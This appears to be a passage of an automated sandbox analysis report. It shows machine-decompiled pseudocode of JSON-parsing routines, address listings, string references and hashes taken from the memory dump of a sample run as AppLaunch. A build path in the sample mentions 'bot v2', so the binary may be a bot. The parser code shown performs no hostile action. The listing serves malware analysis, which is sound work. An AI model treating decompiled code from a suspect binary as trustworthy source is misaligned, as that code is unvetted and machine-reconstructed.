															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420100( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421790( *(__ebp + 8), __eax);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L46:
																goto L49;
															} else {
																L45:
																 *((char*)(__ebp - 0x2cb)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2cb));
															}
															goto L79;
														case 6:
															L38:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200E0( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421740(__ecx, __eax);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L40:
																goto L49;
															} else {
																L39:
																 *((char*)(__ebp - 0x2c9)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c9));
															}
															goto L79;
														case 7:
															L24:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200C0(__ecx);
															 *((long long*)(__ebp - 0x424)) = __fp0;
															__esp = __esp - 8;
															asm("movsd xmm0, [ebp-0x424]");
															asm("movsd [esp], xmm0");
															__eax = E00411E30(__ecx);
															__esp = __esp + 8;
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L26:
																__ecx =  *(__ebp - 0x2a8);
																__ecx =  *(__ebp - 0x2a8) + 0x30;
																__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
																__esp = __esp - 8;
																asm("movsd xmm0, [ebp-0x424]");
																asm("movsd [esp], xmm0");
																__ecx =  *(__ebp + 8);
																__eax = E004216F0( *(__ebp + 8), __eax);
																__ecx = __al & 0x000000ff;
																__eflags = __ecx;
																if(__ecx != 0) {
																	L28:
																	goto L49;
																} else {
																	L27:
																	 *((char*)(__ebp - 0x2c5)) = 0;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00416CE0(__ecx);
																	__al =  *((intOrPtr*)(__ebp - 0x2c5));
																}
															} else {
																L25:
																__ecx = __ebp - 0x45c;
																 *(__ebp - 0x3f8) = E00414FA0(__ebp - 0x45c, 0);
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x3f4) =  *(__ebp - 0x2a8) + 0x30;
																__eax = __ebp - 0x19c;
																__ecx =  *(__ebp - 0x3f4);
																__eax = E004201C0(__ebx,  *(__ebp - 0x3f4), __edi, __esi, __ebp - 0x19c);
																__ecx = __ebp - 0xf4;
																__eax = E00406320(__eflags, __ebp - 0xf4, "number overflow parsing \'", __eax);
																__edx = __ebp - 0x184;
																 *(__ebp - 0x3fc) = __eax;
																__eax =  *(__ebp - 0x3f8);
																__ecx =  *(__ebp - 0x3fc);
																__edx = __ebp - 0x5a4;
																 *(__ebp - 0x408) = E0040C390(__ebx, __edi, __esi, __eflags, __ebp - 0x5a4, 0x196,  *(__ebp - 0x3fc),  *(__ebp - 0x3f8));
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x400) =  *(__ebp - 0x2a8) + 0x30;
																__ecx = __ebp - 0x16c;
																__ecx =  *(__ebp - 0x400);
																 *(__ebp - 0x40c) = E004201C0(__ebx,  *(__ebp - 0x400), __edi, __esi, __ebp - 0x16c);
																 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
																 *(__ebp - 0x404) =  *(__ebp - 0x2a8) + 0x30;
																__eax = __ebp - 0x54c;
																__ecx =  *(__ebp - 0x404);
																__ecx = E00420140( *(__ebp - 0x404), __ebp - 0x54c);
																 *(__ebp - 0x410) = __eax;
																__ecx =  *(__ebp - 0x408);
																__edx =  *(__ebp - 0x40c);
																__eax =  *(__ebp - 0x410);
																__ecx =  *(__ebp + 8);
																__eax = E00412100( *(__ebp + 8),  *(__ebp - 0x410),  *(__ebp - 0x40c),  *(__ebp - 0x408));
																 *(__ebp - 0x2c4) = __al;
																__ecx = __ebp - 0x16c;
																__eax = E00416980(__ebp - 0x16c);
																__ecx = __ebp - 0x5a4;
																__eax = E00416D90(__ebp - 0x5a4);
																__ecx = __ebp - 0x184;
																__eax = E00416980(__ebp - 0x184);
																__ecx = __ebp - 0xf4;
																__eax = E00416980(__ebp - 0xf4);
																__ecx = __ebp - 0x19c;
																__eax = E00416980(__ebp - 0x19c);
																__ecx = __ebp - 0x45c;
																__eax = E00416950(__ebp - 0x45c);
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *(__ebp - 0x2c4);
															}
															goto L79;
														case 8:
															L17:
															__ecx =  *(__ebp + 8);
															__eax = E004240A0(__ebx,  *(__ebp + 8), __edi, __esi, __eflags, 0xffffffff);
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L19:
																__ecx =  *(__ebp - 0x2a8);
																__eflags = E00420190( *(__ebp - 0x2a8)) - 0xa;
																if(__eflags != 0) {
																	L23:
																	 *(__ebp - 0x2c3) = 1;
																	__eax = __ebp - 0x2c3;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00422090(__ecx, __ebp - 0x2c3);
																	goto L1;
																} else {
																	L20:
																	__ecx =  *(__ebp + 8);
																	__eax = E0041F000(__ebx, __ecx, __edi, __esi, __eflags);
																	__edx = __al & 0x000000ff;
																	__eflags = __edx;
																	if(__edx != 0) {
																		L22:
																		goto L49;
																	} else {
																		L21:
																		 *((char*)(__ebp - 0x2c2)) = 0;
																		__ecx = __ebp - 0x2bc;
																		__eax = E00416CE0(__ecx);
																		__al =  *((intOrPtr*)(__ebp - 0x2c2));
																	}
																}
															} else {
																L18:
																 *((char*)(__ebp - 0x2d6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2d6));
															}
															goto L79;
														case 9:
															goto L0;
														case 0xa:
															L47:
															__ecx = __ebp - 0x46c;
															 *(__ebp - 0x418) = E00414FA0(__ebp - 0x46c, 0);
															__ecx = __ebp - 0x64;
															__eax = E00415310(__ebp - 0x64, __eflags, "value");
															__edx = __ebp - 0x64;
															__eax = __ebp - 0x1cc;
															__ecx =  *(__ebp - 0x2a8);
															 *(__ebp - 0x41c) = E0041F5F0(__ebx,  *(__ebp - 0x2a8), __edi, __esi, __eflags, __ebp - 0x1cc, 0, __ebp - 0x64);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x414) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x558;
															__ecx =  *(__ebp - 0x414);
															 *(__ebp - 0x2e0) = E00420140( *(__ebp - 0x414), __ebp - 0x558);
															__eax =  *(__ebp - 0x418);
															__ecx =  *(__ebp - 0x41c);
															__edx =  *(__ebp - 0x2e0);
															__eax = __ebp - 0x604;
															 *(__ebp - 0x2ec) = E0040C460(__ebx, __edi, __esi, __eflags, __ebp - 0x604, 0x65,  *(__ebp - 0x2e0),  *(__ebp - 0x41c),  *(__ebp - 0x418));
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e4) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x1b4;
															__ecx =  *(__ebp - 0x2e4);
															 *(__ebp - 0x2f0) = E004201C0(__ebx,  *(__ebp - 0x2e4), __edi, __esi, __ebp - 0x1b4);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e8) =  *(__ebp - 0x2a8) + 0x30;
															__ecx = __ebp - 0x564;
															__ecx =  *(__ebp - 0x2e8);
															__ecx = E00420140( *(__ebp - 0x2e8), __ebp - 0x564);
															 *(__ebp - 0x2f4) = __eax;
															__edx =  *(__ebp - 0x2ec);
															__eax =  *(__ebp - 0x2f0);
															__ecx =  *(__ebp - 0x2f4);
															__ecx =  *(__ebp + 8);
															__eax = E00412100( *(__ebp + 8),  *(__ebp - 0x2f4),  *(__ebp - 0x2f0),  *(__ebp - 0x2ec));
															 *(__ebp - 0x2cc) = __al;
															__ecx = __ebp - 0x1b4;
															__eax = E00416980(__ebp - 0x1b4);
															__ecx = __ebp - 0x604;
															__eax = E00416D90(__ebp - 0x604);
															__ecx = __ebp - 0x1cc;
															__eax = E00416980(__ebp - 0x1cc);
															__ecx = __ebp - 0x64;
															__eax = E00416980(__ebp - 0x64);
															__ecx = __ebp - 0x46c;
															__eax = E00416950(__ebp - 0x46c);
															__ecx = __ebp - 0x2bc;
															__eax = E00416CE0(__ecx);
															__al =  *(__ebp - 0x2cc);
															goto L79;
													}
												}
											}
											goto L79;
										}
										_t471 = E00416CE0(_t875 - 0x2bc);
									}
								}
							} else {
								L52:
								 *((char*)(_t875 - 0x2ce)) = 1;
								E00416CE0(_t875 - 0x2bc);
								_t471 =  *((intOrPtr*)(_t875 - 0x2ce));
							}
						} else {
							L8:
							 *((char*)(_t875 - 0x2bd)) = 0;
							E00416CE0(_t875 - 0x2bc);
							_t471 =  *((intOrPtr*)(_t875 - 0x2bd));
						}
					}
					L79:
					return E00424900(_t471, _t651,  *(_t875 - 4) ^ _t875, _t837, _t873, _t874);
					L80:
				}
				L5:
				 *((char*)(_t875 - 0x2d7)) = 0;
				E00416CE0(_t875 - 0x2bc);
				_t471 =  *((intOrPtr*)(_t875 - 0x2d7));
				goto L79;
			}

0x00412260
0x00412260
0x00412260
0x00412260
0x00412260
0x00412260
0x00412265
0x0041226a
0x0041226f
0x00000000
0x00000000
0x0041228e
0x00412299
0x0041229c
0x004122cf
0x004122d5
0x004122d9
0x00412432
0x00412444
0x00412449
0x0041244c
0x0041244e
0x0041246d
0x00412478
0x0041247b
0x004125d4
0x004125d4
0x004125e8
0x004125f3
0x00000000
0x00412481
0x00412481
0x0041248e
0x0041249c
0x004124b9
0x004124c8
0x004124e0
0x0041250c
0x0041251b
0x00412533
0x00412542
0x00412561
0x00412575
0x00412584
0x00412590
0x0041259b
0x004125a6
0x004125ae
0x004125b9
0x004125c4
0x004125c9
0x004125c9
0x00412450
0x00412450
0x00412450
0x0041245d
0x00412462
0x00412462
0x004122df
0x004122df
0x004122ec
0x004122fa
0x00412317
0x00412326
0x0041233e
0x0041236a
0x00412379
0x00412391
0x004123a0
0x004123bf
0x004123c5
0x004123e2
0x004123ee
0x004123f9
0x00412404
0x0041240c
0x00412417
0x00412422
0x00412427
0x00412427
0x0041229e
0x0041229e
0x004122a1
0x004122a9
0x004122ab
0x004122ca
0x00412c6c
0x00412c75
0x00412c7b
0x00412c80
0x00412c83
0x00412c85
0x00412ca4
0x00412cb8
0x00412cc0
0x00412cc2
0x00412eb3
0x00412eb9
0x00412ebe
0x00412ec1
0x004131f2
0x004131f8
0x004131fc
0x0041326a
0x00413277
0x00413288
0x004132a8
0x004132b7
0x004132cf
0x004132fb
0x0041330a
0x00413322
0x00413331
0x00413350
0x00413356
0x00413373
0x0041337f
0x0041338a
0x00413395
0x004133a0
0x004133ab
0x004133b6
0x004133bb
0x004131fe
0x004131fe
0x00413201
0x00413206
0x00413209
0x0041320b
0x0041322a
0x00413238
0x0041323a
0x0041323c
0x0041324b
0x00413250
0x00413250
0x00413259
0x0041325e
0x00000000
0x0041320d
0x0041320d
0x0041320d
0x0041321a
0x0041321f
0x0041321f
0x0041320b
0x00412ec7
0x00412ec7
0x00412ed2
0x00412ed5
0x00413037
0x00413049
0x00413051
0x00413053
0x00413072
0x0041307d
0x00413080
0x004131e2
0x004131e8
0x00000000
0x00413086
0x00413086
0x00413093
0x004130a4
0x004130c4
0x004130d3
0x004130eb
0x00413117
0x00413126
0x0041313e
0x0041314d
0x0041316c
0x00413179
0x0041318f
0x0041319b
0x004131a6
0x004131b1
0x004131bc
0x004131c7
0x004131d2
0x004131d7
0x004131d7
0x00413055
0x00413055
0x00413055
0x00413062
0x00413067
0x00413067
0x00412edb
0x00412edb
0x00412ee8
0x00412ef9
0x00412f19
0x00412f28
0x00412f40
0x00412f6c
0x00412f7b
0x00412f93
0x00412fa2
0x00412fc1
0x00412fd5
0x00412fe4
0x00412ff0
0x00412ffb
0x00413006
0x00413011
0x0041301c
0x00413027
0x0041302c
0x0041302c
0x00412ed5
0x00412cc8
0x00412cc8
0x00412cce
0x00412cd3
0x00412cd6
0x00412ce8
0x00412ce8
0x00412cee
0x00412cf2
0x00412d60
0x00412d6d
0x00412d7b
0x00412d98
0x00412da7
0x00412dbf
0x00412deb
0x00412dfa
0x00412e12
0x00412e21
0x00412e40
0x00412e54
0x00412e63
0x00412e6f
0x00412e7a
0x00412e85
0x00412e8d
0x00412e98
0x00412ea3
0x00412ea8
0x00412cf4
0x00412cf4
0x00412cf7
0x00412cff
0x00412d01
0x00412d20
0x00412d2e
0x00412d30
0x00412d32
0x00412d41
0x00412d46
0x00412d46
0x00412d4f
0x00412d54
0x00000000
0x00412d03
0x00412d03
0x00412d03
0x00412d10
0x00412d15
0x00412d15
0x00412d01
0x00412cd8
0x00412cd8
0x00412cde
0x00000000
0x0041221b
0x00412231
0x00412c6e
0x00412c6e
0x00000000
0x00412237
0x00412237
0x00412237
0x00412240
0x0041224d
0x00412b19
0x00412b26
0x00412b34
0x00412b51
0x00412b60
0x00412b78
0x00412ba4
0x00412bb3
0x00412bcb
0x00412bda
0x00412bf9
0x00412bff
0x00412c1c
0x00412c28
0x00412c33
0x00412c3e
0x00412c46
0x00412c51
0x00412c5c
0x00412c61
0x00412253
0x00412253
0x00412259
0x00000000
0x00000000
0x00000000
0x004128d1
0x004128d3
0x004128d6
0x004128db
0x004128de
0x004128e0
0x004128ff
0x00000000
0x004128e2
0x004128e2
0x004128e2
0x004128e9
0x004128ef
0x004128f4
0x004128f4
0x00000000
0x00000000
0x0041286d
0x0041286f
0x00412872
0x00412877
0x0041287a
0x0041287c
0x0041289b
0x00000000
0x0041287e
0x0041287e
0x0041287e
0x00412885
0x0041288b
0x00412890
0x00412890
0x00000000
0x00000000
0x004128a0
0x004128a0
0x004128a8
0x004128ab
0x004128ad
0x004128cc
0x00000000
0x004128af
0x004128af
0x004128af
0x004128b6
0x004128bc
0x004128c1
0x004128c1
0x00000000
0x00000000
0x00412945
0x00412945
0x0041294b
0x0041294e
0x00412954
0x0041295c
0x0041295f
0x00412961
0x00412980
0x00000000
0x00412963
0x00412963
0x00412963
0x0041296a
0x00412970
0x00412975
0x00412975
0x00000000
0x00000000
0x00412985
0x00412985
0x0041298b
0x0041298e
0x00412993
0x00412995
0x00412998
0x0041299d
0x004129a0
0x004129a2
0x004129c1
0x00000000
0x004129a4
0x004129a4
0x004129a4
0x004129ab
0x004129b1
0x004129b6
0x004129b6
0x00000000
0x00000000
0x00412904
0x00412904
0x0041290a
0x0041290d
0x00412912
0x00412914
0x00412917
0x0041291c
0x0041291f
0x00412921
0x00412940
0x00000000
0x00412923
0x00412923
0x00412923
0x0041292a
0x00412930
0x00412935
0x00412935
0x00000000
0x00000000
0x0041268a
0x0041268a
0x00412690
0x00412693
0x00412698
0x0041269e
0x004126a1
0x004126a9
0x004126ae
0x004126b3
0x004126b6
0x004126b9
0x004126bb
0x0041281d
0x0041281d
0x00412823
0x00412826
0x0041282c
0x0041282f
0x00412837
0x0041283c
0x0041283f
0x00412844
0x00412847
0x00412849
0x00412868
0x00000000
0x0041284b
0x0041284b
0x0041284b
0x00412852
0x00412858
0x0041285d
0x0041285d
0x004126c1
0x004126c1
0x004126c3
0x004126ce
0x004126da
0x004126dd
0x004126e8
0x004126ef
0x004126f5
0x00412700
0x00412707
0x00412710
0x0041271f
0x00412725
0x0041272c
0x00412738
0x00412747
0x00412753
0x00412756
0x0041275c
0x00412763
0x0041276e
0x0041277a
0x0041277d
0x00412783
0x0041278a
0x00412795
0x0041279c
0x004127a2
0x004127a9
0x004127b0
0x004127b7
0x004127ba
0x004127bf
0x004127c5
0x004127cb
0x004127d0
0x004127d6
0x004127db
0x004127e1
0x004127e6
0x004127ec
0x004127f1
0x004127f7
0x004127fc
0x00412802
0x00412807
0x0041280d
0x00412812
0x00412812
0x00000000
0x00000000
0x004125fd
0x004125ff
0x00412602
0x00412607
0x0041260a
0x0041260c
0x0041262b
0x0041262b
0x00412636
0x00412639
0x0041266c
0x0041266c
0x00412673
0x0041267a
0x00412680
0x00000000
0x0041263b
0x0041263b
0x0041263b
0x0041263e
0x00412643
0x00412646
0x00412648
0x00412667
0x00000000
0x0041264a
0x0041264a
0x0041264a
0x00412651
0x00412657
0x0041265c
0x0041265c
0x00412648
0x0041260e
0x0041260e
0x0041260e
0x00412615
0x0041261b
0x00412620
0x00412620
0x00000000
0x00000000
0x00000000
0x00000000
0x004129c6
0x004129c8
0x004129d3
0x004129de
0x004129e1
0x004129e6
0x004129ec
0x004129f3
0x004129fe
0x00412a0a
0x00412a0d
0x00412a13
0x00412a1a
0x00412a25
0x00412a2b
0x00412a32
0x00412a39
0x00412a42
0x00412a51
0x00412a5d
0x00412a60
0x00412a66
0x00412a6d
0x00412a78
0x00412a84
0x00412a87
0x00412a8d
0x00412a94
0x00412a9f
0x00412aa6
0x00412aac
0x00412ab3
0x00412aba
0x00412ac1
0x00412ac4
0x00412ac9
0x00412acf
0x00412ad5
0x00412ada
0x00412ae0
0x00412ae5
0x00412aeb
0x00412af0
0x00412af3
0x00412af8
0x00412afe
0x00412b03
0x00412b09
0x00412b0e
0x00000000
0x00000000
0x00412259
0x0041224d
0x00000000
0x00412231
0x004133ce
0x004133ce
0x00412cd6
0x00412c87
0x00412c87
0x00412c87
0x00412c94
0x00412c99
0x00412c99
0x004122ad
0x004122ad
0x004122ad
0x004122ba
0x004122bf
0x004122bf
0x004122ab
0x004133d3
0x004133e0
0x00000000
0x004133e0
0x00412271
0x00412271
0x0041227e
0x00412283
0x00000000

Strings

object separator, xrefs: 00412494
object key, xrefs: 004122F2

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID: object key$object separator
API String ID: 0-2279923633
Opcode ID: 20df716e8a0d0462d2be2e1431f20dfcb9ccbf1d10dcf14e7a3b582f0becdda1
Instruction ID: 436fa2d12f3173d488189a72ef08e37e681d4c8765ebc7f4923139111a471148
Opcode Fuzzy Hash: 20df716e8a0d0462d2be2e1431f20dfcb9ccbf1d10dcf14e7a3b582f0becdda1
Instruction Fuzzy Hash: 7AA16970A101289FCB29EB15DC91BEEB7B9AF44304F4041DEA14AA6292DF745FC4CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004134A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004134A0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				signed char _t462;
				signed char _t465;
				intOrPtr _t471;
				signed char _t473;
				signed char _t476;
				void* _t477;
				signed char _t499;
				signed char _t507;
				void* _t554;
				signed char _t575;
				signed char _t648;
				signed int _t875;
				void* _t877;

				L0:
				while(1) {
					L0:
					_t874 = __esi;
					_t873 = __edi;
					_t651 = __ebx;
					_t462 = E00424260(__ebx,  *((intOrPtr*)(_t875 + 8)), __edi, __esi, 0xffffffff);
					_t837 = _t462 & 0x000000ff;
					if((_t462 & 0x000000ff) == 0) {
						break;
					}
					L6:
					__eflags = E00420190( *(_t875 - 0x2a8)) - 0xb;
					if(__eflags != 0) {
						L10:
						__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 4;
						if(__eflags == 0) {
							L12:
							_t465 = E00420E20( *((intOrPtr*)(_t875 + 8)), E00420170( *(_t875 - 0x2a8) + 0x30));
							_t837 = _t465 & 0x000000ff;
							__eflags = _t465 & 0x000000ff;
							if((_t465 & 0x000000ff) != 0) {
								L14:
								__eflags = E00420190( *(_t875 - 0x2a8)) - 0xc;
								if(__eflags == 0) {
									L16:
									 *((char*)(_t875 - 0x2c1)) = 0;
									E00422090(_t875 - 0x2bc, _t875 - 0x2c1);
									E00420190( *(_t875 - 0x2a8));
									goto L1;
								} else {
									L15:
									 *((intOrPtr*)(_t875 - 0x3d4)) = E00414FA0(_t875 - 0x434, 0);
									E00415310(_t875 - 0x4c, __eflags, "object separator");
									 *((intOrPtr*)(_t875 - 0x3d8)) = E0041F5F0(__ebx,  *(_t875 - 0x2a8), __edi, __esi, __eflags, _t875 - 0x154, 0xc, _t875 - 0x4c);
									 *((intOrPtr*)(_t875 - 0x3d0)) =  *(_t875 - 0x2a8) + 0x30;
									 *((intOrPtr*)(_t875 - 0x3dc)) = E00420140( *((intOrPtr*)(_t875 - 0x3d0)), _t875 - 0x534);
									 *((intOrPtr*)(_t875 - 0x3e8)) = E0040C460(__ebx, __edi, __esi, __eflags, _t875 - 0x5e4, 0x65,  *((intOrPtr*)(_t875 - 0x3dc)),  *((intOrPtr*)(_t875 - 0x3d8)),  *((intOrPtr*)(_t875 - 0x3d4)));
									 *((intOrPtr*)(_t875 - 0x3e0)) =  *(_t875 - 0x2a8) + 0x30;
									 *((intOrPtr*)(_t875 - 0x3ec)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x3e0)), _t873, _t874, _t875 - 0x13c);
									 *((intOrPtr*)(_t875 - 0x3e4)) =  *(_t875 - 0x2a8) + 0x30;
									 *(_t875 - 0x3f0) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x3e4)), _t875 - 0x540));
									_t837 =  *(_t875 - 0x3f0);
									 *((char*)(_t875 - 0x2c0)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *(_t875 - 0x3f0),  *((intOrPtr*)(_t875 - 0x3ec)),  *((intOrPtr*)(_t875 - 0x3e8)));
									E00416980(_t875 - 0x13c);
									E00416D90(_t875 - 0x5e4);
									E00416980(_t875 - 0x154);
									E00416980(_t875 - 0x4c);
									E00416950(_t875 - 0x434);
									E00416CE0(_t875 - 0x2bc);
									_t471 =  *((intOrPtr*)(_t875 - 0x2c0));
								}
							} else {
								L13:
								 *((char*)(_t875 - 0x2bf)) = 0;
								E00416CE0(_t875 - 0x2bc);
								_t471 =  *((intOrPtr*)(_t875 - 0x2bf));
							}
						} else {
							L11:
							 *((intOrPtr*)(_t875 - 0x3b0)) = E00414FA0(_t875 - 0x444, 0);
							E00415310(_t875 - 0x34, __eflags, "object key");
							 *((intOrPtr*)(_t875 - 0x3b4)) = E0041F5F0(__ebx,  *(_t875 - 0x2a8), __edi, __esi, __eflags, _t875 - 0x124, 4, _t875 - 0x34);
							 *((intOrPtr*)(_t875 - 0x3ac)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3b8)) = E00420140( *((intOrPtr*)(_t875 - 0x3ac)), _t875 - 0x51c);
							 *(_t875 - 0x3c4) = E0040C460(__ebx, __edi, __esi, __eflags, _t875 - 0x5c4, 0x65,  *((intOrPtr*)(_t875 - 0x3b8)),  *((intOrPtr*)(_t875 - 0x3b4)),  *((intOrPtr*)(_t875 - 0x3b0)));
							 *((intOrPtr*)(_t875 - 0x3bc)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3c8)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x3bc)), _t873, _t874, _t875 - 0x10c);
							 *((intOrPtr*)(_t875 - 0x3c0)) =  *(_t875 - 0x2a8) + 0x30;
							 *((intOrPtr*)(_t875 - 0x3cc)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x3c0)), _t875 - 0x528));
							_t837 =  *(_t875 - 0x3c4);
							 *((char*)(_t875 - 0x2be)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x3cc)),  *((intOrPtr*)(_t875 - 0x3c8)),  *(_t875 - 0x3c4));
							E00416980(_t875 - 0x10c);
							E00416D90(_t875 - 0x5c4);
							E00416980(_t875 - 0x124);
							E00416980(_t875 - 0x34);
							E00416950(_t875 - 0x444);
							E00416CE0(_t875 - 0x2bc);
							_t471 =  *((intOrPtr*)(_t875 - 0x2be));
						}
					} else {
						L7:
						_t648 = E0041F160( *((intOrPtr*)(_t875 + 8)), __eflags);
						__eflags = _t648 & 0x000000ff;
						if((_t648 & 0x000000ff) != 0) {
							L9:
							L49:
							L51:
							_t473 = E0041EDD0(_t875 - 0x2bc);
							_t837 = _t473 & 0x000000ff;
							__eflags = _t473 & 0x000000ff;
							if(__eflags == 0) {
								L53:
								_t476 = E004172F0(E0041ACC0(_t875 - 0x2bc, _t875 - 0x44c), __eflags);
								__eflags = _t476 & 0x000000ff;
								if((_t476 & 0x000000ff) == 0) {
									L63:
									_t477 = E00420190( *(_t875 - 0x2a8));
									__eflags = _t477 - 0xd;
									if(_t477 != 0xd) {
										L71:
										__eflags =  *( *(_t875 - 0x2a8) + 0x28) - 0xb;
										if(__eflags != 0) {
											L77:
											 *((intOrPtr*)(_t875 - 0x38c)) = E00414FA0(_t875 - 0x4bc, 0);
											E00415310(_t875 - 0xc4, __eflags, "object");
											 *((intOrPtr*)(_t875 - 0x390)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x2a4, 0xb, _t875 - 0xc4);
											 *((intOrPtr*)(_t875 - 0x388)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x394)) = E00420140( *((intOrPtr*)(_t875 - 0x388)), _t875 - 0x504);
											 *(_t875 - 0x3a0) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x6a4, 0x65,  *((intOrPtr*)(_t875 - 0x394)),  *((intOrPtr*)(_t875 - 0x390)),  *((intOrPtr*)(_t875 - 0x38c)));
											 *((intOrPtr*)(_t875 - 0x398)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x3a4)) = E004201C0(_t651,  *((intOrPtr*)(_t875 - 0x398)), _t873, _t874, _t875 - 0x28c);
											 *((intOrPtr*)(_t875 - 0x39c)) =  *(_t875 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t875 - 0x3a8)) = E00417420(E00420140( *((intOrPtr*)(_t875 - 0x39c)), _t875 - 0x510));
											_t837 =  *(_t875 - 0x3a0);
											 *((char*)(_t875 - 0x2d5)) = E00412130( *((intOrPtr*)(_t875 + 8)),  *((intOrPtr*)(_t875 - 0x3a8)),  *((intOrPtr*)(_t875 - 0x3a4)),  *(_t875 - 0x3a0));
											E00416980(_t875 - 0x28c);
											E00416D90(_t875 - 0x6a4);
											E00416980(_t875 - 0x2a4);
											E00416980(_t875 - 0xc4);
											E00416950(_t875 - 0x4bc);
											E00416CE0(_t875 - 0x2bc);
											_t471 =  *((intOrPtr*)(_t875 - 0x2d5));
										} else {
											L72:
											_t499 = E0041F160( *((intOrPtr*)(_t875 + 8)), __eflags);
											_t837 = _t499 & 0x000000ff;
											__eflags = _t499 & 0x000000ff;
											if((_t499 & 0x000000ff) != 0) {
												L74:
												__eflags = E0041EDD0(_t875 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2ba1);
													E00430DB7(_t651, _t837, _t873, _t874, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t877 = _t877 + 0xc;
												}
												E00421D70(_t875 - 0x2bc, __eflags);
												 *(_t875 - 0x2a9) = 1;
												goto L1;
											} else {
												L73:
												 *((char*)(_t875 - 0x2d4)) = 0;
												E00416CE0(_t875 - 0x2bc);
												_t471 =  *((intOrPtr*)(_t875 - 0x2d4));
											}
										}
									} else {
										L64:
										__eflags = E00420190( *(_t875 - 0x2a8)) - 4;
										if(__eflags == 0) {
											L66:
											_t507 = E00420E20( *((intOrPtr*)(_t875 + 8)), E00420170( *(_t875 - 0x2a8) + 0x30));
											__eflags = _t507 & 0x000000ff;
											if((_t507 & 0x000000ff) != 0) {
												L68:
												__eflags = E00420190( *(_t875 - 0x2a8)) - 0xc;
												if(__eflags == 0) {
													L70:
													E00420190( *(_t875 - 0x2a8));
													goto L1;
												} else {
													L69:
													 *((intOrPtr*)(_t875 - 0x368)) = E00414FA0(_t875 - 0x4ac, 0);
													E00415310(_t875 - 0xac, __eflags, "object separator");
													 *((intOrPtr*)(_t875 - 0x36c)) = E0041F5F0(_t651,  *(_t875 - 0x2a8), _t873, _t874, __eflags, _t875 - 0x274, 0xc, _t875 - 0xac);
													 *((intOrPtr*)(_t875 - 0x364)) =  *(_t875 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t875 - 0x370)) = E00420140( *((intOrPtr*)(_t875 - 0x364)), _t875 - 0x4ec);
													 *((intOrPtr*)(_t875 - 0x37c)) = E0040C460(_t651, _t873, _t874, __eflags, _t875 - 0x684, 0x65,  *((intOrPtr*)(_t875 - 0x370)),  *((intOrPtr*)(_t875 - 0x36c)),  *((intOrPtr*)(_t875 - 0x368)));
													 *((intOrPtr*)(_t875 - 0x374)) =  *(_t875 - 0x2a8) + 0x30;
